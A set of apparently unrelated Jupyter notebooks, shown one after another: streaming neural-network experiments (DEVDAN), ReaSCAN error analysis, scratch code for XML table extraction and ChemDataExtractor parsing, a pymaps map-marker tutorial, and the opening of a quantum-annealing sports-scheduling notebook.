allMetrics.append(allPerformance)
plotPerformance(performanceHistory3[0],performanceHistory3[1],performanceHistory3[2],
performanceHistory3[3],performanceHistory3[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet4, performanceHistory4, allPerformance = DEVDANmain(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory4[0],performanceHistory4[1],performanceHistory4[2],
performanceHistory4[3],performanceHistory4[4])
# all results
# 0: accuracy
# 1: f1_score
# 2: precision_score
# 3: recall_score
# 4: training_time
# 5: testingTime
# 6: nHiddenLayer
# 7: nHiddenNode
meanResults = np.round_(np.mean(allMetrics,0), decimals=2)
stdResults = np.round_(np.std(allMetrics,0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)',stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)',stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)',stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)',stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)',stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)',stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)',stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)',stdResults[7].item())
```
### 50% labeled data
print('50% Data')
allMetrics = []
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet0, performanceHistory0, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.5)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory0[0],performanceHistory0[1],performanceHistory0[2],
performanceHistory0[3],performanceHistory0[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet1, performanceHistory1, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.5)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory1[0],performanceHistory1[1],performanceHistory1[2],
performanceHistory1[3],performanceHistory1[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet2, performanceHistory2, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.5)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory2[0],performanceHistory2[1],performanceHistory2[2],
performanceHistory2[3],performanceHistory2[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet3, performanceHistory3, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.5)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory3[0],performanceHistory3[1],performanceHistory3[2],
performanceHistory3[3],performanceHistory3[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet4, performanceHistory4, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.5)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory4[0],performanceHistory4[1],performanceHistory4[2],
performanceHistory4[3],performanceHistory4[4])
# all results
# 0: accuracy
# 1: f1_score
# 2: precision_score
# 3: recall_score
# 4: training_time
# 5: testingTime
# 6: nHiddenLayer
# 7: nHiddenNode
meanResults = np.round_(np.mean(allMetrics,0), decimals=2)
stdResults = np.round_(np.std(allMetrics,0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)',stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)',stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)',stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)',stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)',stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)',stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)',stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)',stdResults[7].item())
### 25% Labeled Data
print('25% Data')
allMetrics = []
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet0, performanceHistory0, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.25)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory0[0],performanceHistory0[1],performanceHistory0[2],
performanceHistory0[3],performanceHistory0[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet1, performanceHistory1, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.25)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory1[0],performanceHistory1[1],performanceHistory1[2],
performanceHistory1[3],performanceHistory1[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet2, performanceHistory2, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.25)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory2[0],performanceHistory2[1],performanceHistory2[2],
performanceHistory2[3],performanceHistory2[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet3, performanceHistory3, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.25)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory3[0],performanceHistory3[1],performanceHistory3[2],
performanceHistory3[3],performanceHistory3[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet4, performanceHistory4, allPerformance = DEVDANmain(DevdanNet,dataStreams,labeled = False, nLabeled = 0.25)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory4[0],performanceHistory4[1],performanceHistory4[2],
performanceHistory4[3],performanceHistory4[4])
# all results
# 0: accuracy
# 1: f1_score
# 2: precision_score
# 3: recall_score
# 4: training_time
# 5: testingTime
# 6: nHiddenLayer
# 7: nHiddenNode
meanResults = np.round_(np.mean(allMetrics,0), decimals=2)
stdResults = np.round_(np.std(allMetrics,0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)',stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)',stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)',stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)',stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)',stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)',stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)',stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)',stdResults[7].item())
### Infinite Delay
print('Infinite Delay')
allMetrics = []
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet0, performanceHistory0, allPerformance = DEVDANmainID(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory0[0],performanceHistory0[1],performanceHistory0[2],
performanceHistory0[3],performanceHistory0[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet1, performanceHistory1, allPerformance = DEVDANmainID(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory1[0],performanceHistory1[1],performanceHistory1[2],
performanceHistory1[3],performanceHistory1[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet2, performanceHistory2, allPerformance = DEVDANmainID(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory2[0],performanceHistory2[1],performanceHistory2[2],
performanceHistory2[3],performanceHistory2[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet3, performanceHistory3, allPerformance = DEVDANmainID(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory3[0],performanceHistory3[1],performanceHistory3[2],
performanceHistory3[3],performanceHistory3[4])
# initialization
DevdanNet = DEVDAN(dataStreams.nInput,dataStreams.nOutput)
DevdanNet4, performanceHistory4, allPerformance = DEVDANmainID(DevdanNet,dataStreams)
allMetrics.append(allPerformance)
plotPerformance(performanceHistory4[0],performanceHistory4[1],performanceHistory4[2],
performanceHistory4[3],performanceHistory4[4])
# all results
# 0: accuracy
# 1: f1_score
# 2: precision_score
# 3: recall_score
# 4: training_time
# 5: testingTime
# 6: nHiddenLayer
# 7: nHiddenNode
meanResults = np.round_(np.mean(allMetrics,0), decimals=2)
stdResults = np.round_(np.std(allMetrics,0), decimals=2)
print('\n')
print('========== Performance occupancy ==========')
print('Preq Accuracy: ', meanResults[0].item(), '(+/-)',stdResults[0].item())
print('F1 score: ', meanResults[1].item(), '(+/-)',stdResults[1].item())
print('Precision: ', meanResults[2].item(), '(+/-)',stdResults[2].item())
print('Recall: ', meanResults[3].item(), '(+/-)',stdResults[3].item())
print('Training time: ', meanResults[4].item(), '(+/-)',stdResults[4].item())
print('Testing time: ', meanResults[5].item(), '(+/-)',stdResults[5].item())
print('\n')
print('========== Network ==========')
print('Number of hidden layers: ', meanResults[6].item(), '(+/-)',stdResults[6].item())
print('Number of features: ', meanResults[7].item(), '(+/-)',stdResults[7].item())
| github_jupyter |
```
import os
from typing import List
from typing import Tuple
import logging
FORMAT = "%(asctime)-15s %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO,
datefmt="%Y-%m-%d %H:%M")
logger = logging.getLogger(__name__)
from collections import defaultdict
from collections import Counter
import json
import torch
import numpy as np
from xlwt import Workbook
import sys
sys.path.append(os.path.join(os.path.dirname("__file__"), '..', '..', 'dataset'))
from world import *
from vocabulary import Vocabulary as ReaSCANVocabulary
from object_vocabulary import *
import numpy as np
from typing import Tuple
from typing import List
from typing import Any
import matplotlib.pyplot as plt
def bar_plot(values: dict, title: str, save_path: str, errors={}, y_axis_label="Occurrence"):
sorted_values = list(values.items())
sorted_values = [(y, x) for x, y in sorted_values]
sorted_values.sort()
values_per_label = [value[0] for value in sorted_values]
if len(errors) > 0:
sorted_errors = [errors[value[1]] for value in sorted_values]
else:
sorted_errors = None
labels = [value[1] for value in sorted_values]
assert len(labels) == len(values_per_label)
y_pos = np.arange(len(labels))
plt.bar(y_pos, values_per_label, yerr=sorted_errors, align='center', alpha=0.5)
plt.gcf().subplots_adjust(bottom=0.2, )
plt.xticks(y_pos, labels, rotation=90, fontsize="xx-small")
plt.ylabel(y_axis_label)
plt.title(title)
plt.savefig(save_path)
plt.close()
def grouped_bar_plot(values: dict, group_one_key: Any, group_two_key: Any, title: str, save_path: str,
errors_group_one={}, errors_group_two={}, y_axis_label="Occurence", sort_on_key=True):
sorted_values = list(values.items())
if sort_on_key:
sorted_values.sort()
values_group_one = [value[1][group_one_key] for value in sorted_values]
values_group_two = [value[1][group_two_key] for value in sorted_values]
if len(errors_group_one) > 0:
sorted_errors_group_one = [errors_group_one[value[0]] for value in sorted_values]
sorted_errors_group_two = [errors_group_two[value[0]] for value in sorted_values]
else:
sorted_errors_group_one = None
sorted_errors_group_two = None
labels = [value[0] for value in sorted_values]
assert len(labels) == len(values_group_one)
assert len(labels) == len(values_group_two)
y_pos = np.arange(len(labels))
fig, ax = plt.subplots()
width = 0.35
p1 = ax.bar(y_pos, values_group_one, width, yerr=sorted_errors_group_one, align='center', alpha=0.5)
p2 = ax.bar(y_pos + width, values_group_two, width, yerr=sorted_errors_group_two, align='center', alpha=0.5)
plt.gcf().subplots_adjust(bottom=0.2, )
plt.xticks(y_pos, labels, rotation=90, fontsize="xx-small")
plt.ylabel(y_axis_label)
plt.title(title)
ax.legend((p1[0], p2[0]), (group_one_key, group_two_key))
plt.savefig(save_path)
plt.close()
# Change to your directories here!
pattern = "e"
seed = 88
split = "test"
predictions_file = f"../../../testing_logs/{pattern}-random-seed-{seed}/{split}_{pattern}-random-seed-{seed}.json"
output_file = f"../../../testing_logs/{pattern}-random-seed-{seed}/{split}_{pattern}-random-seed-{seed}-analysis.txt"
save_directory = f"../../../testing_logs/{pattern}-random-seed-{seed}/"
# test out the vocabulary
intransitive_verbs = ["walk"]
transitive_verbs = ["push", "pull"]
adverbs = ["while zigzagging", "while spinning", "cautiously", "hesitantly"]
nouns = ["circle", "cylinder", "square", "box"]
color_adjectives = ["red", "blue", "green", "yellow"]
size_adjectives = ["big", "small"]
relative_pronouns = ["that is"]
relation_clauses = ["in the same row as",
"in the same column as",
"in the same color as",
"in the same shape as",
"in the same size as",
"inside of"]
vocabulary = Vocabulary.initialize(intransitive_verbs=intransitive_verbs,
transitive_verbs=transitive_verbs, adverbs=adverbs, nouns=nouns,
color_adjectives=color_adjectives,
size_adjectives=size_adjectives,
relative_pronouns=relative_pronouns,
relation_clauses=relation_clauses)
# test out the object vocab
min_object_size = 1
max_object_size = 4
object_vocabulary = ObjectVocabulary(shapes=vocabulary.get_semantic_shapes(),
colors=vocabulary.get_semantic_colors(),
min_size=min_object_size, max_size=max_object_size)
# object_vocabulary.generate_objects()
assert os.path.exists(predictions_file), "Trying to open a non-existing predictions file."
error_analysis = {
"target_length": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"input_length": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"verb_in_command": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"manner": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"distance_to_target": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"direction_to_target": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"actual_target": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
}
all_accuracies = []
exact_matches = []
with open(predictions_file, 'r') as infile:
data = json.load(infile)
logger.info("Running error analysis on {} examples.".format(len(data)))
for predicted_example in data:
# Get the scores of the current example.
accuracy = predicted_example["accuracy"]
exact_match = predicted_example["exact_match"]
all_accuracies.append(accuracy)
exact_matches.append(exact_match)
# Get the information about the current example.
example_information = {
"input_length": len(predicted_example["input"]),
"verb_in_command": vocabulary.translate_word(predicted_example["input"][0])}
adverb = ""
if predicted_example['input'][-1] in vocabulary.get_adverbs():
adverb = predicted_example['input'][-1]
manner = vocabulary.translate_word(adverb)
example_information["target_length"] = len(predicted_example["target"])
situation_repr = predicted_example["situation"]
situation = Situation.from_representation(situation_repr[0])
example_information["actual_target"] = ' '.join([str(situation.target_object.object.size),
situation.target_object.object.color,
situation.target_object.object.shape])
example_information["direction_to_target"] = situation.direction_to_target
example_information["distance_to_target"] = situation.distance_to_target
example_information["manner"] = manner
# Add that information to the analysis.
for key in error_analysis.keys():
error_analysis[key][example_information[key]]["accuracy"].append(accuracy)
error_analysis[key][example_information[key]]["exact_match"].append(exact_match)
# Write the information to a file and make plots
workbook = Workbook()
with open(output_file, 'w') as outfile:
outfile.write("Error Analysis\n\n")
outfile.write(" Mean accuracy: {}\n".format(np.mean(np.array(all_accuracies))))
exact_matches_counter = Counter(exact_matches)
outfile.write(" Num. exact matches: {}\n".format(exact_matches_counter[True]))
outfile.write(" Num not exact matches: {}\n\n".format(exact_matches_counter[False]))
for key, values in error_analysis.items():
sheet = workbook.add_sheet(key)
sheet.write(0, 0, key)
sheet.write(0, 1, "Num examples")
sheet.write(0, 2, "Mean accuracy")
sheet.write(0, 3, "Std. accuracy")
sheet.write(0, 4, "Exact Match")
sheet.write(0, 5, "Not Exact Match")
sheet.write(0, 6, "Exact Match Percentage")
outfile.write("\nDimension {}\n\n".format(key))
means = {}
standard_deviations = {}
num_examples = {}
exact_match_distributions = {}
exact_match_relative_distributions = {}
for i, (item_key, item_values) in enumerate(values.items()):
outfile.write(" {}:{}\n\n".format(key, item_key))
accuracies = np.array(item_values["accuracy"])
mean_accuracy = np.mean(accuracies)
means[item_key] = mean_accuracy
num_examples[item_key] = len(item_values["accuracy"])
standard_deviation = np.std(accuracies)
standard_deviations[item_key] = standard_deviation
exact_match_distribution = Counter(item_values["exact_match"])
exact_match_distributions[item_key] = exact_match_distribution
exact_match_relative_distributions[item_key] = exact_match_distribution[True] / (
exact_match_distribution[False] + exact_match_distribution[True])
outfile.write(" Num. examples: {}\n".format(len(item_values["accuracy"])))
outfile.write(" Mean accuracy: {}\n".format(mean_accuracy))
outfile.write(" Min. accuracy: {}\n".format(np.min(accuracies)))
outfile.write(" Max. accuracy: {}\n".format(np.max(accuracies)))
outfile.write(" Std. accuracy: {}\n".format(standard_deviation))
outfile.write(" Num. exact match: {}\n".format(exact_match_distribution[True]))
outfile.write(" Num. not exact match: {}\n\n".format(exact_match_distribution[False]))
sheet.write(i + 1, 0, item_key)
sheet.write(i + 1, 1, len(item_values["accuracy"]))
sheet.write(i + 1, 2, mean_accuracy)
sheet.write(i + 1, 3, standard_deviation)
sheet.write(i + 1, 4, exact_match_distribution[True])
sheet.write(i + 1, 5, exact_match_distribution[False])
sheet.write(i + 1, 6, exact_match_distribution[True] / (
exact_match_distribution[False] + exact_match_distribution[True]))
outfile.write("\n\n\n")
bar_plot(means, title=key, save_path=os.path.join(save_directory, key + '_accuracy'),
errors=standard_deviations, y_axis_label="accuracy")
bar_plot(exact_match_relative_distributions, title=key, save_path=os.path.join(
save_directory, key + '_exact_match_rel'),
errors={}, y_axis_label="Exact Match Percentage")
grouped_bar_plot(values=exact_match_distributions, group_one_key=True, group_two_key=False,
title=key + ' Exact Matches', save_path=os.path.join(save_directory,
key + '_exact_match'),
sort_on_key=True)
outfile_excel = output_file.split(".txt")[0] + ".xls"
workbook.save(outfile_excel)
exact_matches_counter[True] / (exact_matches_counter[True] + exact_matches_counter[False])
```
| github_jupyter |
```
import xml.etree.cElementTree as ET
import pandas as pd
filepath ="C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
tree = ET.ElementTree(filepath)
root = tree.getroot()
root = ET.fromstring(country_data_as_string)
teststring = '<coooo:yessir>'
start = teststring.index(':')
end = len(teststring)
substring = teststring[start+1:end-1]
print(substring)
import xml.etree.ElementTree as ET
import pandas as pd
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
tree = ET.iterparse(filepath)
#root = tree.getroot()
#print(root.findall('./////{http://www.elsevier.com/xml/svapi/article/dtd}table'))
tag = '{http://www.elsevier.com/xml/svapi/article/dtd}table'
for event, node in tree:
if node.tag in tag:
print(node.tag, node.text)
#print(list(root.iter()))
import xml.etree.ElementTree as ET
namespaces = {'ce': 'http://www.elsevier.com/xml/common/dtd'}
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
def header(filepath, target_tabl_id):
lst = []
tree = ET.parse(filepath) #read in the XML
for tags in tree.iter('{http://www.elsevier.com/xml/common/dtd}floats'):
tabl_id = tags.find('ce:table', namespaces).attrib['id']
if tabl_id == target_tabl_id:#choose the row to pull from
for var in tags.iter('{http://www.elsevier.com/xml/common/dtd}caption'):
name = var.find('ce:simple-para', namespaces).text
print(lst)
lst = lst.append(name)
return lst
output = header(filepath, "tbl1")
print(output)
file = open("C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml",
"r", encoding="utf8")
file.read()
import xml.etree.ElementTree as ET
namespaces = {'ce': 'http://www.elsevier.com/xml/common/dtd'}
filepath = "C:/Users/shulo/DataExtractor/DataExtractor/notebook/Demos/testing_download_articles/write_test_els_paper6.xml"
def header(filepath, target_tabl_id):
lst = []
tree = ET.parse(filepath) #read in the XML
for tags in tree.iter('{http://www.elsevier.com/xml/common/dtd}floats'):
tabl_id = tags.find('ce:table', namespaces).attrib['id']
if tabl_id == target_tabl_id:#choose the row to pull from
for var in tags.iter('{http://www.elsevier.com/xml/common/dtd}caption'):
name = var.find('ce:simple-para', namespaces).text
return lst.append(name)
output = header(filepath, "tbl1")
print(output)
# Code below extracts title from table
import xml.etree.ElementTree as ET
namespaces = {'ce': 'http://www.elsevier.com/xml/common/dtd'}
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
def header(filepath, target_tabl_id):
lst = []
tree = ET.parse(filepath) #read in the XML
for tags in tree.iter('{http://www.elsevier.com/xml/common/dtd}table'):
tabl_id = tags.find('ce:caption', namespaces).attrib['id']
if tabl_id == target_tabl_id:#choose the row to pull from
for var in tags.iter('{http://www.elsevier.com/xml/common/dtd}caption'):
name = var.find('ce:simple-para', namespaces).text
lst.append(name)
return lst
output = header(filepath, "cap0070")
print(output)
import xml.etree.ElementTree as ET
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
tree = ET.parse(filepath)
root = ET.tostring(tree.getroot())
lst = tree.iter('{http://www.elsevier.com/xml/common/cals/dtd}thead')
for tags in lst:
row = tags.find('{http://www.elsevier.com/xml/common/cals/dtd}row')
entry_list = row.findall('{http://www.elsevier.com/xml/common/dtd}entry')
for x in entry_list:
print(x.text)
# Code extracts all elements within tag tbody which is coorelated to numerical values in table
import xml.etree.ElementTree as ET
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
tree = ET.parse(filepath)
root = ET.tostring(tree.getroot())
lst = tree.iter('{http://www.elsevier.com/xml/common/cals/dtd}tbody')
for tags in lst:
row = tags.find('{http://www.elsevier.com/xml/common/cals/dtd}row')
entry_list = row.findall('{http://www.elsevier.com/xml/common/dtd}entry')
for x in entry_list:
print(x.text)
# Testing ChemDataExtractor Input 1
import logging
import re
import pandas as pd
import urllib
import time
# import feedparser
import chemdataextractor as cde
from chemdataextractor import Document
import chemdataextractor.model as model
from chemdataextractor.model import Compound, UvvisSpectrum, UvvisPeak, BaseModel, StringType, ListType, ModelType
from chemdataextractor.parse.common import hyphen
from chemdataextractor.parse.base import BaseParser
from chemdataextractor.utils import first
from chemdataextractor.parse.actions import strip_stop
from chemdataextractor.parse.elements import W, I, T, R, Optional, ZeroOrMore, OneOrMore
from chemdataextractor.parse.cem import chemical_name
from chemdataextractor.doc import Paragraph, Sentence
# Input 1
import chemdataextractor
import chemdataextractor.model as model
from chemdataextractor.model import Compound
from chemdataextractor.doc import Document, Heading, Paragraph, Sentence
# Create a Simple example document with a single heading followed by a single paragraph
d = Document(
Heading(u'Synthesis of 2,4,6-trinitrotoluene (3a)'),
Paragraph(u'The procedure was followed to yield a pale yellow solid (b.p. 240 °C)')
)
# display a heading and a paragraph of the given content
d
# Next define the schema of a new property, and add it to the Compound model
from chemdataextractor.model import BaseModel, StringType, ListType, ModelType
class BoilingPoint(BaseModel):
value = StringType()
units = StringType()
Compound.boiling_points = ListType(ModelType(BoilingPoint))
# define new parsing rules that define how to interpret and convert it into the model
import re
from chemdataextractor.parse import R, I, W, Optional, merge
prefix = (R(u'^b\.?p\.?$', re.I) | I(u'boiling') + I(u'point')).hide()
units = (W(u'°') + Optional(R(u'^[CFK]\.?$')))(u'units').add_action(merge)
value = R(u'^\d+(\.\d+)?$')(u'value')
bp = (prefix + value + units)(u'bp')
from chemdataextractor.parse.base import BaseParser
from chemdataextractor.utils import first
class BpParser(BaseParser):
root = bp
def interpret(self, result, start, end):
compound = Compound(
boiling_points=[
BoilingPoint(
value=first(result.xpath('./value/text()')),
units=first(result.xpath('./units/text()'))
)
]
)
yield compound
Paragraph.parsers = [BpParser()]
d = Document(
Heading(u'Synthesis of 2,4,6-trinitrotoluene (3a)'),
Paragraph(u'The procedure was followed to yield a pale yellow solid (b.p. 240 °C)')
)
d.records.serialize()
# Next trying to organize everything to be presentable
# psuedo code
#for each property in the table {
#prop_list = prop_list.add(property)
#}
#for each material {
#add the name of the material to a list of material names
#}
#for each material in the above list {
#create an empty list to store the properties for this material specifically
#for each property for that material {
#add the value to the recently created list
#}
#}
for x in entry_list:
prop_list = proplist.add(x.text)
import re
from chemdataextractor.parse import R, I, W, Optional, merge
prefix = (R(/mp+|MP+[mp] m\.p|M.P+|(melting point)|\d/gim)).hide()
units = (W(u'°') + Optional(R(u'^[CFK]\.?$')))(u'units').add_action(merge)
value = R(u'^\d+(\.\d+)?$')(u'value')
bp = (prefix + value + units)(u'bp')
"""So this is Walid's first go at using Regex,
to be quite honest it seemed like a big challange he would never overcome,
but with the motivation from his good pals Shu and Adam he has been grinding it out.
So without further ado, let's talk about melting point.
Now why Melting point? Well you see lad, M.P can be repped different ways.
MP is when the material starts melting duh.
Notice how I hit you with both Melting Point and melting point see the captilization?
what about m.P or M.p? so if I say M.p = 0K or MP is 10000 F (woah those are crazy numbers).
what if i have some typos like mmp or MMpp"""
```
| github_jupyter |
```
{%custom-css%}
```
{%header%}
A Marker identifies a location on a map. By default, a marker uses a standard image.
Markers can display custom images using the icon parameter.
<h1 class="title1">Table of Contents</h1>
* [Create a map with a marker](#marker1)
* [Marker animation](#marker2)
* [Custom icons](#marker3)
* [Custom colors](#marker4)
* [Custom icon from URL](#marker5)
* [Creating a MarkerCluster](#marker6)
```
import os
import random
from IPython.display import HTML, display
import pandas as pd
```
<a id="marker1"></a>
<h1 class="title1">Create a Map with a Marker</h1>
```
API_KEY = os.environ['MAPS_API_KEY']
from pymaps import Map
from pymaps.marker import Marker, MarkerCluster
fernando_de_noronha = (-3.8576, -32.4297)
m = Map(api_key=API_KEY, zoom=13)
title = 'Fernando de Noronha' # hover the mouse over the marker to show the title
Marker(fernando_de_noronha, title=title).add_to(m)
m
```
* Lets add more markers...
```
cities = {"rome": (41.9028, 12.4964),
'paris' : (48.8566, 2.3522),
'madrid' : (40.4168, -3.7038),
'berlin' : (52.5200, 13.4050),
'amsterdan' : (52.3702, 4.8952),
'london' : (51.509865, -0.118092)}
map = Map([-18.99, -44.04], api_key=API_KEY, zoom=6, show_pegman=False, disable_default_ui=True)
for n, values in enumerate(cities.items(), 1):
city_name, latlgn = values
title = city_name.title()
Marker(latlgn, title=title, label=n).add_to(map)
map.fit_bounds(cities.values())
map
```
<a id="marker2"></a>
## Marker animation
```
for marker in map.children['marker']:
if marker.title == 'London':
marker.set_animation('BOUNCE')
marker.label = ''
map
```
<a id="marker3"></a>
## Built-in custom icons
```
from pymaps.icon import *
from pymaps.utils import random_latlng
```
There are **8 customs** icons and **19 color sets** that you can use to customize your markers
### Custom Icons
```
m = Map(api_key=API_KEY)
lat = 0
lng = -80
for n, shape in enumerate(SHAPES):
color = list(COLORS.keys())[n]
icon = Icon(shape, color=color, size=2)
Marker([lat, lng], icon=icon, title=shape).add_to(m)
lng += 20
m
```
<a id="marker4"></a>
## Built-in custom colors
```
m = Map(api_key=API_KEY, style='grayscale')
lat = -30
lng = 0
for n, color in enumerate(COLORS.keys()):
if n > 0 and n % 5 == 0:
lat += 20
lng -= 100
icon = Icon('dot', color=color, size=2)
Marker([lat, lng], icon=icon, title=color).add_to(m)
lng += 20
m
```
### Customize everything !
```
m = Map(api_key=API_KEY, zoom=1, style='silver')
for shape in SHAPES:
size = random.randint(1, 3)
color=random.choice([c for c in COLORS])
icon = Icon(shape, color=color, size=size)
coordinates = random_latlng()
Marker(coordinates, icon=icon, title=shape + ' - ' + color).add_to(m)
m
```
<a id="marker5"></a>
## Custom icon from URL
* Markers's icons also can be customized from any image URL
```
gb_icon = 'https://www.workaway.info/gfx/flags/flag_great_britain.png'
for marker in map.children['marker']:
if marker.title == 'London':
marker.icon = gb_icon
marker.set_animation('BOUNCE')
marker.label = ''
else:
marker.set_animation('DROP')
map.set_style('water')
map
```
<a id="marker6"></a>
# MarkerCluster
```
cities['buenos_aires'] = (-34.6037, -58.3816)
cities['brasilia'] = (-15.7942, -47.8822)
cities['santiago'] = (-33.4489, -70.6693)
map = Map(api_key=API_KEY, show_pegman=False, disable_default_ui=True)
cluster = MarkerCluster()
for n, values in enumerate(cities.items(), 1):
city_name, latlgn = values
title = city_name.title()
Marker(latlgn, title=title, label=n).add_to(cluster)
cluster.add_to(map)
map
```
| github_jupyter |
Make the Binary Quadratic Model for sports scheduling problem.
Definitions and comments in this code are based on the following paper.
Title:
**SOLVING LARGE BREAK MINIMIZATION PROBLEMS IN A MIRRORED DOUBLE ROUND-ROBIN TOURNAMENT USING QUANTUM ANNEALING.**
(https://arxiv.org/pdf/2110.07239.pdf)
Author:
- Michiya Kuramata (Tokyo Institute of Technology, Tokyo, Japan)
- Ryota Katsuki (NTT DATA, Tokyo, Japan)
- Nakata Kazuhide (Tokyo Institute of Technology, Tokyo, Japan)
```
import itertools
import pyqubo
from dwave.system.samplers import DWaveSampler
from dwave.system import EmbeddingComposite
import neal
import gurobipy
from sports.sports_scheduling import *
from sports.sports_gurobi import *
```
# MDRRT using D-Wave Machine (or SA).
#### Set the Parameters for MDRRT
```
# 2n is the number of teams.
# n should be 2 <= n <= 24.
# If n=2, the num of teams is 4 and timeslots in RRT and MDRRT are 3 and 6 respectively (same shape with Table 1).
# If n=4, the num of teams is 8 and timeslots in RRT and MDRRT are 7 and 14.
n = 4
# version is the problem instance used in this experiments.
# Each version is correspond to the csv files in problems directory.
# These files are used in Numerical experiments and Discussion section in our paper.
# Csv files are calculated by Kirkman Schedule and shuffled in advance independently.
# If you need to remake them, run sports_scheduling.kirkman_schedule and shuffle them on your own.
# If you set n=2 and choose version=0, you are going to use problems/02_v0_schedule.csv
version = 0
mdrrt = MDRRT(n, f'./problems/{n:02}_v{version}_schedule.csv')
```
`mdrrt.schedule` is based on MDRRT (**Mirrored** Double Round Robin Tournament), so the table in timeslot 0\~6 and 7\~13 is same.
- num of teams: 8
- num of timeslots in MDRRT: 14
```
mdrrt.schedule
# Definition of decision variable z
